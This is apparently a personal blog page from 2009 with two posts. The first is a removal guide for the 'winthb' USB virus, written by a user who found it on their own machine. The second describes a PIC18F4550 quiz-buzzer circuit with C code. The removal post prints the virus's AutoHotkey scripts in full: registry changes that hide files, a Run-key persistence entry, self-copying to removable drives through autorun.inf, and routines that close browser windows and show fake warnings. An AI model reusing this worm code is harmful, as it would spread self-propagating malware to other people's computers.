Monday, January 26, 2009

How to remove virus winthb also win.exe and avgs.exe

winthb is a virus program recently came to my system from a usb flash device. It hides the hidden folders completely and copies the autorun.inf file to c: drive and reproduces it whenever we delete that.The icon of the c: drive changes to something like below

The virus program also has the symptoms listed below,

1. when we try to search orkut in google, it will display an error message " WARNING,orkut is sending viruses to your pc. To protect your pc close this window ,orkut is infected by jammer worm " also it will play a music . (win.mp3)
2. when we try youtube ,WARNING,Dangerous script send by youtube, Windows system files damage if this script run
3.In my system mozilla firefox was disabled when the thb fellow came ,anyway the firefox showed "File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus"


How to remove winthb virus
take start>run>enter temp
clear the directory
also run %temp 
clear that also
As a first step when u boot into windows press ALT+CTRL+DEL.Stop the process win.exe and avgs.exe if they are running.Goto run type regedit(enter).Then the registry editor window will come.[1]Goto HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue will be made 0 by the program make it 1.
Now all the hidden files will be available. Goto Tools>folderoptions>view>show all hidden files.
Now search for avgs.exe in the windows search engine.If there is a file available in the search loacte its path.Do not double click on any drives to get into them because most of the viruses get into system when we double click on the drive by running the autorun.inf file.If we have to , do a adreess bar opening .I got the fellows from my C:\windows\system32\win.dll\
the folder icon for win.dll was not appearing as a usual folder icon it was the icon for dll files and also it was hidden. So please do not run any virus while doing these.If u do so u wont see the hidden files. In this case u have to do the [1].FInd the folder and delete it. Find any file named win.exe ,avgs.exe,.The folder C:\windows\system32\win.dll\ contained some files named 
win.exe
avgs.exe
Desktop.ini
std.txt
Drivelist.txt
Icon.ico
reproduce.txt
win.mp3
thb.ico
Dll.ico
script1.txt


The virus script looks like the one below,
std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
 regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run D:\RECYCLE\win.exe D:\RECYCLE\script1.txt
Run D:\RECYCLE\avgs.exe D:\RECYCLE\reproduce.txt


reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,D:\RECYCLE\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
     {
     driveget,data1,status,%element%:\
      ifequal,data1,Ready
      {
        FileCopydir,D:\RECYCLE\reg.bkp,%element%:\,1

      }

     }
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,D:\RECYCLE\win.exe D:\RECYCLE\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,D:\RECYCLE\win.exe D:\RECYCLE\std.txt

ifnotexist,c:\thb.ico
 ifnotexist,c:\autorun.inf
         filedelete,c:\autorun.inf
         Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\thb.ico,c:\
Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\autorun.inf,c:\
return


script1.txt

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
 ifinstring,ed,orkut
  {
   winclose %ed%
   soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
   return
  }
 ifinstring,ed,youtube
  {
   winclose %ed%
   soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
   return
  }
 ifinstring,ed,Mozilla Firefox
  {
    winclose %ed%
    msgbox,262160,File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus  `r`r       ,30
    return
  }
ifwinactive ahk_class IEFrame
{

 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,orkut
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r                orkut is infected by jammer worm ,30
    return
  }
 ControlGetText,ed,edit1,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }
 ControlGetText,ed,edit2,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
     return
  }
 ControlGetText,ed,edit3,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
   msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }
 ControlGetText,ed,edit4,ahk_class IEFrame
 ifinstring,ed,youtube
  {
    winclose ahk_class IEFrame
    soundplay,D:\RECYCLE\win.mp3
    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
    return
  }

}
return

  • Creates c:\windows\system32\win.dll\svchost.exe
  • create folder C:\WINDOWS\system32\win.dll
  • create folder C:\WINDOWS\system32\win.dll\reg.bkp
  • Copies filec:\docume~1\user\locals~1\temp\winthb\win.exe to c:\windows\system32\win.dll\win.exe
  • Copies filec:\docume~1\user\locals~1\temp\winthb\avgs.exe to c:\windows\system32\win.dll\avgs.exe
  • Copies filec:\docume~1\user\locals~1\temp\winthb\drivelist.txt to c:\windows\system32\win.dll\drivelist.txt
  • Copies filec:\docume~1\user\locals~1\temp\winthb\win.mp3 to c:\windows\system32\win.dll\win.mp3
  • Copies filec:\docume~1\user\locals~1\temp\winthb\Icon.ico to c:\windows\system32\win.dll\Icon.ico
  • Copies filec:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\windows\system32\win.dll\thb.ico
  • Copies filec:\docume~1\user\locals~1\temp\winthb\DLL.ico to c:\windows\system32\win.dll\DLL.ico
  • Deletes c:\autorun.inf
  • Copies filec:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\thb.ico
  • Copies filec:\docume~1\user\locals~1\temp\winthb\autorun.inf to c:\autorun.inf

After all these things i found a copy of the thb files in my D:\RECYCLE it looked like RECYCLER but there was no R at the end.Clear that aslo.Also idont know whether the script has any other effects.If any feel free to comment.Thanks

Monday, January 12, 2009

Simple College /School Quizzing Buzzer Circuit using PIC 18f4550 with 7 Segment Display

A buzzer finds application in quizzing, where the quiz master must know exactly who presses the first button to answer the question.Instead of glowing the bulb corresponding to the person who presses the button first, we can show the number corresponding to the person in a 7 segment display.This is desirable since its simple and less power consuming than lighting a bulb.We can simply program the PIC 18f4550 using USB cable connected to the system. No need for any programmer arrangement if we have already programmed the boot loader into the device. We need the PICDEM FS USB tool available in Microchip's site.This tool helps us to program the device using USB cable. Another tool called C-18 needs to to installed on the system along with the mplab ide to develop the software for the project .
#include "p18cxxx.h"
#include "usart.h"

extern void _startup (void);
// See c018i.c in your C18 compiler directory
#pragma code _RESET_INTERRUPT_VECTOR = 0x000800
void _reset (void)
{
_asm goto _startup _endasm
}
#pragma code

#define byte unsigned char
void delay (void);
void display(byte);
void main(void)
{
byte c=0;

TRISD = 0;
TRISB = 255;

while(1)
{

c= ~PORTB;
switch (c)
{
case 1:
display(0);
break;
case 2:
display(1);
break;
case 4:
display(2);
break;
case 8:
display(3);
break;
case 16:
display(4);
break;
case 32:
display(5);
break;
case 64:
display(6);
break;
case 128:
display(7);
break;

default:
display(10);

break;
}

delay();




if(c)
{
while(1);
}
//the while loop resets to start of main if reset is done pin 1 gnded (hardware reset)
}
}



void delay(void)
{
long int count = 200000;
while (count--)
{
}

}


void display(byte a)
{
switch(a)
{// these may or maynot work on all 7 segments to determine which segment is which we need to write test programs
case 0: PORTD = 0b01000000;break;
case 1: PORTD = 0b11111010;break;
case 2: PORTD = 0b00100100;break;
case 3: PORTD = 0b00110000;break;
case 4: PORTD = 0b10010010;break;
case 5: PORTD = 0b00010001;break;
case 6: PORTD = 0b00000001;break;
case 7: PORTD = 0b11111000;break;
case 8: PORTD = 0b00000000;break;
case 9: PORTD = 0b10010000;break;
case 10: PORTD = 0b11111111;break;
default :
PORTD = 0b11111111;
break;
}
}

PORTD is used as the output port ,ie the seven segment display to display the number corresponding to the pressed pin on PORTB.PORTB is normally connected to VCC through a pullup (10k). Each pin is gnded to detect a key press .A switch is connected between the pin and the gnd.The ckt detects the first key pressed among 8 keys and displays the keynumber on seven segment.